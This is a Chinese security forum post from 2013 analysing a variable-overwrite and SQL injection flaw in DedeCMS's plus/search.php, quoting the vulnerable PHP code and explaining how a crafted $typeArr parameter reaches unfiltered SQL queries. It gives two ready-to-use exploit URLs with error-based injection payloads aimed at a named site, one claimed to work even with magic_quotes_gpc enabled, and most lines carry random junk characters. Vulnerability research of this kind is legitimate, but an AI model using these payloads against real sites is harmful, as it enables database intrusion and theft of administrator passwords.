微博上看到就分析了一下,这个漏洞不止一处地方可以被利用.其实可以无视magic_quotes_gpc = On的时候.真心不鸡肋.2 p& n% {: }# |0 e! L( _
作者: c4rp3nt3r@0x50sec.org9 ?5 p: V/ z" @# `, d# Z) V
Dedecms最新版 plus/search.php 文件存在变量覆盖漏洞,成功利用该漏洞可以获取管理员密码. }, T% s, Y' P% ?- q1 w
' x% M: H6 m3 T$ j
黑哥说漏洞已补.怪我没有测试好.也没用这个黑站…不过这个漏洞真心不错,应该有一定利用价值.标题就不改了,补了就公开了吧.
" q6 a4 x4 i" q$ G& \ 0 S5 P( o! B# r6 ?
============6 g. J! e3 U q2 p* C3 ^) x% [8 M
' m. w& s! [9 G7 u ! q$ K" ?( c+ f& p: h4 X0 J& J3 g
Dedecms最新版 plus/search.php 文件存在变量覆盖漏洞,成功利用该漏洞可以获取管理员密码.
: h% [8 @" P( R $ P( n, {+ E" j) T1 K6 U/ O
require_once(dirname(__FILE__).”/../include/common.inc.php”);9 B3 R$ y) }0 x4 V
require_once(DEDEINC.”/arc.searchview.class.php”);
6 s2 K: p7 B' R W7 E' W ) t/ u G4 Y: o4 T4 U
$pagesize = (isset($pagesize) && is_numeric($pagesize)) ? $pagesize : 10;6 N+ @ E( V* W
$typeid = (isset($typeid) && is_numeric($typeid)) ? $typeid : 0;
& b2 i, D; I! `. O& V& v$channeltype = (isset($channeltype) && is_numeric($channeltype)) ? $channeltype : 0;% ^9 ]) k+ N( h: {, H0 w. q* l
$kwtype = (isset($kwtype) && is_numeric($kwtype)) ? $kwtype : 1;
& l& L0 X2 C9 }9 J6 l$mid = (isset($mid) && is_numeric($mid)) ? $mid : 0;: D* w4 `6 f k# V& T& o8 B' W Y
- j6 a- }- G1 F8 T/ ^, xif(!isset($orderby)) $orderby=”;
1 |' A& Y @3 |7 felse $orderby = preg_replace(“#[^a-z]#i”, ”, $orderby);
. Q/ U, z$ }) m
3 i3 f. I1 k* r9 x0 }# n
/ j5 V) ~! F7 n2 lif(!isset($searchtype)) $searchtype = ‘titlekeyword’;5 G7 e/ Y1 q4 Q) }
else $searchtype = preg_replace(“#[^a-z]#i”, ”, $searchtype);
6 q2 e7 x- b: H) I( h
9 p) x( n* k8 Y0 qif(!isset($keyword)){, x% M- p- |* }7 j
if(!isset($q)) $q = ”;; c6 i0 P* Y0 Y4 j* h3 q# p
$keyword=$q;
. `) U ?$ C! a% e; C& C }}
9 ~4 ^: Q$ D2 w+ e+ _
- ]( M# c0 }/ ?2 u. m7 x) s) [$oldkeyword = $keyword = FilterSearch(stripslashes($keyword));
4 K# R6 T4 A( v% o 9 F! v7 L4 u! y1 u; w8 R# i8 n- W2 O
//查找栏目信息
H( n2 n# O9 Y, f. {( Q( @if(empty($typeid))4 x! K2 L' T, b1 q
{+ I3 q3 ?) a0 X4 ?! C1 _
$typenameCacheFile = DEDEDATA.’/cache/typename.inc’;0 L( p& a U: J2 w
if(!file_exists($typenameCacheFile) || filemtime($typenameCacheFile) < time()-(3600*24) )3 N/ ~; O+ o) O. Y9 k. ~
{8 M0 ~1 ]. Y+ ^2 p+ l' m9 H: T8 ]
$fp = fopen(DEDEDATA.’/cache/typename.inc’, ‘w’);9 O# Z N4 J/ [$ C; A8 P
fwrite($fp, “<”.”?php\r\n”);. m. `+ ]3 X9 A+ l+ N" W }# L
$dsql->SetQuery(“Select id,typename,channeltype From `#@__arctype`”);
, w% U: Z6 v5 V: q $dsql->Execute();
4 _5 O* b. X$ V- L, C% Y3 Q, g while($row = $dsql->GetArray())! o% t8 Z) n, p4 r& n
{
5 @: {" l% I8 A fwrite($fp, “\$typeArr[{$row['id']}] = ‘{$row['typename']}’;\r\n”);. I' Z; z# t/ w0 E9 D
}
# H0 M0 \, w# ~; n fwrite($fp, ‘?’.'>’);
2 P" v, X' x3 h& h$ y fclose($fp);: w7 `: E. q9 d1 c0 ]# F
}
1 c1 C, b- ^6 H# k //引入栏目缓存并看关键字是否有相关栏目内容
( P% W" r# ]% S+ s( b# _8 o" e& M require_once($typenameCacheFile);# f7 t5 G& R+ \- i
//$typeArr这个数组是包含生成的临时文件 里面定义的,由于dedecms的全局变量机制,我们可以自己定义一个
: F- g) P* e$ N- W" y//
3 j& m4 O, b: J+ L9 k if(isset($typeArr) && is_array($typeArr))/ M' z( y" {9 H- t( W
{5 i! j2 ~" W |# o" e
foreach($typeArr as $id=>$typename)
0 Q* ~ ]' U- P* j' B4 O7 z {
' }& d; i' w1 J; s5 g; p- l 5 l+ x# ]1 K6 u/ C
<font color=”Red”>$keywordn = str_replace($typename, ‘ ‘, $keyword);</font> //这个地方要绕过
2 A( i1 b3 p* K- s% m# y/ j2 f if($keyword != $keywordn)) T# J1 d" Z. `2 x
{
; h- r- G" t6 z, d# ` $keyword = $keywordn;" q: b. f% r* H- u- J1 r
<font color=”Red”>$typeid = $id; </font>// 这里存在变量覆盖漏洞使 $typeid = (isset($typeid) && is_numeric($typeid)) ? $typeid : 0; 这句过滤成了摆设, n: a3 H5 H8 e7 p6 Y* D
break;7 }5 R+ _9 g L; t0 {
}1 d$ D" K7 }( C6 }5 n" e% M
}
& ?$ n; t7 M: m- w8 I3 D }
) a L- I9 q: s1 s4 a}. Z& } e8 {. R& H1 v" I
然后plus/search.php文件下面定义了一个 Search类的对象 ." v3 U# n, w9 k( Y$ r( W4 s
在arc.searchview.class.php 文件的SearchView类的构造函数 声明了一个TypeLink类.
% k, H- t0 M/ h" E6 f9 {# `$this->TypeLink = new TypeLink($typeid);; b) V- W5 D. ?7 c6 K D! P" o9 m
- p- G- r/ O% c( h8 A- x) J
TypeLink类的构造函数没有经过过滤,(程序员以为前面已经过滤过了… )直接带入了sql语句.
( i: ~) E" H: ^) D# p" v
" v; L* E* w4 n8 O. o$ Qclass TypeLink3 u: D# ]2 W% y6 G1 h' U
{6 e" S" t. V$ b0 A' k
var $typeDir;8 [. e% N1 F% i8 S
var $dsql;
% V; _! M! v+ n9 h& ~ var $TypeID;
4 {$ G3 G4 G- e8 S) E var $baseDir;8 H- o; E( {1 d
var $modDir;
$ ^" b& m9 ^9 J2 @8 Y var $indexUrl;- `% z- x& Z$ Q2 O# c8 ?/ C) t
var $indexName;
1 O% Y/ O9 p, H var $TypeInfos;
* p* Q0 `/ P# Y; D5 b+ J var $SplitSymbol;) ]6 Q( Y6 r2 @. e% _
var $valuePosition;
1 K/ \) l; f9 c var $valuePositionName;
8 y- }- K) e* ]$ ?& M8 P var $OptionArrayList;//构造函数///////
4 T8 B' e1 F' [ //php5构造函数
- e" w* @$ p' o function __construct($typeid)
0 g! @ T0 ]7 M* X) d% D {
& h' G5 T# j, v: P# @4 B3 ~) G $this->indexUrl = $GLOBALS['cfg_basehost'].$GLOBALS['cfg_indexurl'];! H, z$ u- M1 _% B
$this->indexName = $GLOBALS['cfg_indexname'];6 S! a1 v! O) P( w. {+ E+ l
$this->baseDir = $GLOBALS['cfg_basedir'];
9 E$ ~# ]1 [* E5 |6 D $this->modDir = $GLOBALS['cfg_templets_dir'];; t0 s' n7 V: N$ w/ A A, t7 s& R
$this->SplitSymbol = $GLOBALS['cfg_list_symbol'];
% O6 |" R7 c; n1 R2 u, i2 z9 ?5 ]; r $this->dsql = $GLOBALS['dsql'];
% E' i% @5 z) h; p! l $this->TypeID = $typeid;$ l2 \" }7 v8 T7 C- W% N) D# G
$this->valuePosition = ”;
; P0 z8 P3 t H $this->valuePositionName = ”;
5 f1 I% m$ W2 I+ ?7 ^0 j5 w $this->typeDir = ”; }# _# a' [5 ? n+ y
$this->OptionArrayList = ”;
3 I0 n" Q) s/ U" p+ P4 J5 g% Y
4 s! ?9 K T+ I% U' I& i3 z; q# z- | //载入类目信息
: b" q+ Y! I2 _# K6 [3 O" c & _' ]4 U, @2 [
<font color=”Red”>$query = “SELECT tp.*,ch.typename as
, I9 n R& U7 L, n7 actypename,ch.addtable,ch.issystem FROM `#@__arctype` tp left join. p+ `; n1 b6 b/ d) l& E
`#@__channeltype` ch
! ]3 N p' L1 r on ch.id=tp.channeltype WHERE tp.id=’$typeid’ “;</font> //注射漏洞发生在这里,很明显需要magic_quotes_gpc = Off 鸡肋了吗?好可以吧至少不需要会员中心阿
; k$ `/ w) A6 M4 F ' z' z$ `$ V, |& s7 `5 ~# J' Q
if($typeid > 0)* D$ _: z, d6 Z5 n' }5 z
{
d$ w1 P" u) Y6 n $this->TypeInfos = $this->dsql->GetOne($query);% X" g1 M6 |3 g4 \ E. {
利用代码一 需要 即使magic_quotes_gpc = Off
9 Q! q8 e, F8 {: G: f9 I& b ' Y1 A% A# v" D0 U) J
www.political-security.com/plus/search.php?typeArr[2%27%20and%20@%60\%27%60%3D0and%20and%20%28SELECT%201%20FROM%20%28select%20count%28*%29,concat%28floor%28rand%280%29*2%29,%28substring%28%28Select%20%28version%28%29%29%29,1,62%29%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29%20and%20%27]=c4&kwtype=0&q=c4rp3nt3r&searchtype=title( D f) o+ x( ~, ?# y7 ]
9 c5 h4 @; |8 F
这只是其中一个利用代码… Search 类的构造函数再往下4 N. J( w2 Q; U2 h% K0 A" ~+ o4 S
" G4 D2 y1 E0 ~. B……省略
4 |& |- R" R8 @, j1 D$this->TypeID = $typeid;; R0 p( j5 ?. p4 z' A
……省略3 t! `6 C% d' t) e
if($this->TypeID==”0″){
! y1 i1 `. F( ^: y; j, M4 U; }3 R $this->ChannelTypeid=1;
7 t( _! `3 ]* m }else{
7 F. d3 y' g: d2 u9 w $row =$this->dsql->GetOne(“SELECT channeltype FROM `#@__arctype` WHERE id={$this->TypeID}”); //这里的注入漏洞无视magic_quotes_gpc = On的存在哦亲
, {, v9 ^8 b2 H2 G5 B+ N/ d//现在不鸡肋了吧亲…
5 q* X$ {7 k2 j3 d $this->ChannelTypeid=$row['channeltype'];) U4 |) r" S" B, d9 ~( Z
1 r" b9 e g% C0 r* E4 B2 T9 X
}1 P! u& [8 |) }
利用代码二,下面这个EXP 即使magic_quotes_gpc = On 也可以成功利用.: x% v4 k) Y, R8 V# {
: Z" C7 d/ @3 S! U- cwww.political-security.com /plus/search.php?typeArr[1%20or%20@%60%27%60%3D1%20and%20%28SELECT%201%20FROM%20%28select%20count%28*%29,concat%28floor%28rand%280%29*2%29,%28substring%28%28Select%20%28version%28%29%29%29,1,62%29%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29%20and%20@%60%27%60%3D0]=11&&kwtype=0&q=1111&searchtype=title& o4 f# F0 G T- M
0 F L0 U1 w2 x4 H# E如果那个数据库里存在内容,就要考虑的复杂点了.我也没考虑那么周全,分析了下然后简单测试了下,也没用来黑站
6 t4 q8 e* D( `) k& c5 m9 f |
发表于 2013-1-19 08:18:56
收藏
支持
反对